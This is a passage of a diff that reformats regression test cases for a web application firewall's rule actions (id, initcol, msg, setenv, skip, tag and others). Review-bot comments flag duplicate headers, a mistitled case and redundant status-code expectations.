Expecting an action, got: id:'1,phase:2,pass,t:trim\"" }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@rx (value1)\" \"id:'1,phase:2,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Action :: id (6/6)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing Action :: id (6/6)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=value1¶m2=value2" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ + "expected": { + "http_code": 200, "parser_error": "action-id.json. Line: 2. Column: 56. Expecting an action, got: ',phase:2,pass,t:trim\"" }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@rx (value1)\" \"id:1',phase:2,pass,t:trim\"" ] diff --git a/test/test-cases/regression/action-initcol.json b/test/test-cases/regression/action-initcol.json index 5051f2e6a5..65498e6eb7 100644 --- a/test/test-cases/regression/action-initcol.json +++ b/test/test-cases/regression/action-initcol.json 
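Review bot: Cases 1/6, 2/6, 5/6 and 6/6 now pair `"http_code": 200` with a `parser_error` expectation, which reads as though a request is served with a rule set that is expected not to load. The harness presumably stops at the parser error and never evaluates the status code, so the value asserts nothing. I would drop `"http_code": 200` from the parser-error cases so that `expected` lists only what is checked. The same pairing appears in "Testing skip action 2/3" in action-skip.json.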
@@ -1,30 +1,42 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing initcol action", - "expected":{ - "debug_log": "Saving variable: IP:auth_attempt with value: " + "enabled": 1, + "version_min": 300000, + "title": "Testing initcol action", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Saving variable: IP:auth_attempt with value: ", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS:User-Agent \"^(.*)$\" \"id:'900018',phase:1,t:none,t:sha1,t:hexEncode,setvar:tx.ua_hash=%{matched_var},nolog,pass\"", "SecRule &TX:REAL_IP \"@eq 0\" \"id:'900021',phase:1,t:none,initcol:global=global,initcol:ip=%{remote_addr}_%{tx.ua_hash},setvar:tx.real_ip=%{remote_addr},nolog,pass\"", diff --git a/test/test-cases/regression/action-msg.json b/test/test-cases/regression/action-msg.json index 6933be8aa5..620253ea59 100644 --- a/test/test-cases/regression/action-msg.json +++ b/test/test-cases/regression/action-msg.json 
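Review bot: The reformatted `headers` object still declares `"User-Agent"` twice (`curl/7.38.0` and `My sweet little browser`). JSON leaves duplicate member names implementation-defined, so which value reaches `REQUEST_HEADERS:User-Agent`, or whether both do, depends on the parser and the harness. Rule 900018 hashes that header into `tx.ua_hash`, which becomes part of the `initcol:ip=` key, so the collection key this case exercises is ambiguous. Keep a single entry, e.g. `"User-Agent": "My sweet little browser"`. The same duplicate appears in the action-setenv, action-setrsc, action-setsid, action-setuid and action-skip cases later in this patch.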
@@ -1,115 +1,117 @@ [ { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing action :: msg (this test is not really testing it)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: msg (this test is not really testing it)", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" }, - 
"body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Saving msg: This is a test, text\/html,application", - "error_log":"" + "expected": { + "debug_log": "Saving msg: This is a test, text/html,application", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,t:lowercase,t:none,msg:'This is a test, %{REQUEST_HEADERS:Accept}%'\"", "SecRule TX \"@contains to_test\" \"id:2,t:lowercase,t:none\"" ] }, - { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing action :: msg - variable expansion", - "client":{ - "ip":"200.249.12.31", - "port":2313 + { + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: msg - variable expansion", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": 
"gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Saving msg: This is a test: PHPSESSID ops", - "error_log":"" + "expected": { + "debug_log": "Saving msg: This is a test: PHPSESSID ops", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@rx PHPSESSID\" \"id:1,capture,t:lowercase,t:none,msg:'This is a test: %{TX.0}% ops'\"", "SecRule TX \"@rx to_test\" \"id:2,t:lowercase,capture,t:none\"" diff --git a/test/test-cases/regression/action-setenv.json b/test/test-cases/regression/action-setenv.json index 2bbe967a4d..3f6361ea5e 100644 --- a/test/test-cases/regression/action-setenv.json +++ b/test/test-cases/regression/action-setenv.json 
@@ -1,93 +1,129 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing setsid action (1/3)", - "expected":{ - "debug_log": "Setting environment variable: variable to PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" + "enabled": 1, + "version_min": 300000, + "title": "Testing setsid action (1/3)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Setting environment variable: variable to PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS:Cookie \"^(.*)$\" \"id:'900018',phase:2,setenv:'variable=%{matched_var}',pass\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing setenv action (2/3)", - "expected":{ - "debug_log": "Setting environment variable: variable to PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" + "enabled": 1, + "version_min": 300000, + "title": "Testing setenv action (2/3)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", + "request": { + "headers": { + "Host": "localhost", + 
"User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "debug_log": "Setting environment variable: variable to PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS:Cookie \"^(.*)$\" \"id:'900018',phase:2,setenv:variable=%{matched_var},pass\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing setenv action (3/3)", - "expected":{ - "debug_log": "Setting environment variable: variable to PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120==test=test" + "enabled": 1, + "version_min": 300000, + "title": "Testing setenv action (3/3)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "debug_log": "Setting environment variable: variable to PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120==test=test", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS:Cookie \"^(.*)$\" 
\"id:'900018',phase:2,setenv:variable=%{matched_var}==test=test,pass\"" ] diff --git a/test/test-cases/regression/action-setrsc.json b/test/test-cases/regression/action-setrsc.json index ffc4e0f226..23e1594e04 100644 --- a/test/test-cases/regression/action-setrsc.json +++ b/test/test-cases/regression/action-setrsc.json @@ -1,31 +1,43 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing setrsc action", - "expected":{ - "debug_log": "Saving variable: RESOURCE:score with value: " + "enabled": 1, + "version_min": 300000, + "title": "Testing setrsc action", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Saving variable: RESOURCE:score with value: ", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS:User-Agent \"^(.*)$\" \"id:'900018',phase:1,t:none,t:sha1,t:hexEncode,setrsc:'test',nolog,pass\"", "SecRule REQUEST_HEADERS \".*\" \"id:'900021',phase:1,setvar:RESOURCE.score=+10\"", diff --git a/test/test-cases/regression/action-setsid.json b/test/test-cases/regression/action-setsid.json index 2d4e2cddfd..20e5053947 100644 --- a/test/test-cases/regression/action-setsid.json +++ b/test/test-cases/regression/action-setsid.json 
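Review bot: The first case in action-setenv.json keeps the title `"Testing setsid action (1/3)"`, although its rule uses `setenv:'variable=%{matched_var}'` and the other two cases are titled setenv. A failure report for this case would point at the wrong action. Change it to `"title": "Testing setenv action (1/3)"`.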
@@ -1,31 +1,43 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing setsid action", - "expected":{ - "debug_log": "Saving variable: SESSION:score with value: " + "enabled": 1, + "version_min": 300000, + "title": "Testing setsid action", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Saving variable: SESSION:score with value: ", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS:User-Agent \"^(.*)$\" \"id:'900018',phase:1,t:none,t:sha1,t:hexEncode,setsid:%{REQUEST_COOKIES:PHPSESSID}%,nolog,pass\"", "SecRule REQUEST_HEADERS \".*\" \"id:'900021',phase:1,setvar:SESSION.score=+10\"", diff --git a/test/test-cases/regression/action-setuid.json b/test/test-cases/regression/action-setuid.json index 726efd1e64..f12d146dad 100644 --- a/test/test-cases/regression/action-setuid.json +++ b/test/test-cases/regression/action-setuid.json 
@@ -1,31 +1,43 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing setuid action", - "expected":{ - "debug_log": "Saving variable: USER:score with value: " + "enabled": 1, + "version_min": 300000, + "title": "Testing setuid action", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Saving variable: USER:score with value: ", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS:User-Agent \"^(.*)$\" \"id:'900018',phase:1,t:none,t:sha1,t:hexEncode,setuid:%{REQUEST_COOKIES:USER}%,nolog,pass\"", "SecRule REQUEST_HEADERS \".*\" \"id:'900021',phase:1,setvar:USER.score=+10\"", diff --git a/test/test-cases/regression/action-skip.json b/test/test-cases/regression/action-skip.json index cb7ba14918..73e7136b16 100644 --- a/test/test-cases/regression/action-skip.json +++ b/test/test-cases/regression/action-skip.json 
@@ -1,31 +1,43 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing skip action 1/3", - "expected":{ - "debug_log": "\\[9\\] Skipped rule id \\'2\\' due to a \\`skip\\' action." + "enabled": 1, + "version_min": 300000, + "title": "Testing skip action 1/3", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "\\[9\\] Skipped rule id \\'2\\' due to a \\`skip\\' action.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS:User-Agent \"^(.*)$\" \"id:'1',phase:1,skip:1\"", "SecRule REQUEST_HEADERS \"should be skipped\" \"id:'2',phase:1,setvar:SESSION.score=+10\"", 
@@ -34,32 +46,44 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing skip action 2/3", - "expected":{ - "parser_error": "Rules error. File: action-skip.json. Line: 2. Column: 71. Expecting an action, got: skip:abc" + "enabled": 1, + "version_min": 300000, + "title": "Testing skip action 2/3", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "http_code": 200, + "parser_error": "Rules error. File: action-skip.json. Line: 2. Column: 71. Expecting an action, got: skip:abc" }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS:User-Agent \"^(.*)$\" \"id:'1',phase:1,skip:abc\"", "SecRule REQUEST_HEADERS \"should be skipped\" \"id:'2',phase:1,setvar:SESSION.score=+10\"", 
@@ -68,32 +92,44 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing skip action 3/3", - "expected":{ - "debug_log": "\\[9\\] Skipped rule id \\'3\\' due to a \\`skip\\' action." + "enabled": 1, + "version_min": 300000, + "title": "Testing skip action 3/3", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "debug_log": "\\[9\\] Skipped rule id \\'3\\' due to a \\`skip\\' action.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS:User-Agent \"^(.*)$\" \"id:'1',phase:1,skip:2\"", "SecRule REQUEST_HEADERS \"should be skipped\" \"id:'2',phase:1,setvar:SESSION.score=+10\"", diff --git a/test/test-cases/regression/action-tag.json b/test/test-cases/regression/action-tag.json index 870297b462..58e1dfb3ad 100644 --- a/test/test-cases/regression/action-tag.json +++ b/test/test-cases/regression/action-tag.json 
@@ -1,115 +1,117 @@ [ { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing action :: tag 1", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: tag 1", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", 
- " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Rule tag: teste", - "error_log":"" + "expected": { + "debug_log": "Rule tag: teste", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,tag:'teste',t:lowercase,t:none\"", "SecRule TX \"@contains to_test\" \"id:2,t:lowercase,t:none\"" ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing action :: tag 2", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: tag 2", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + 
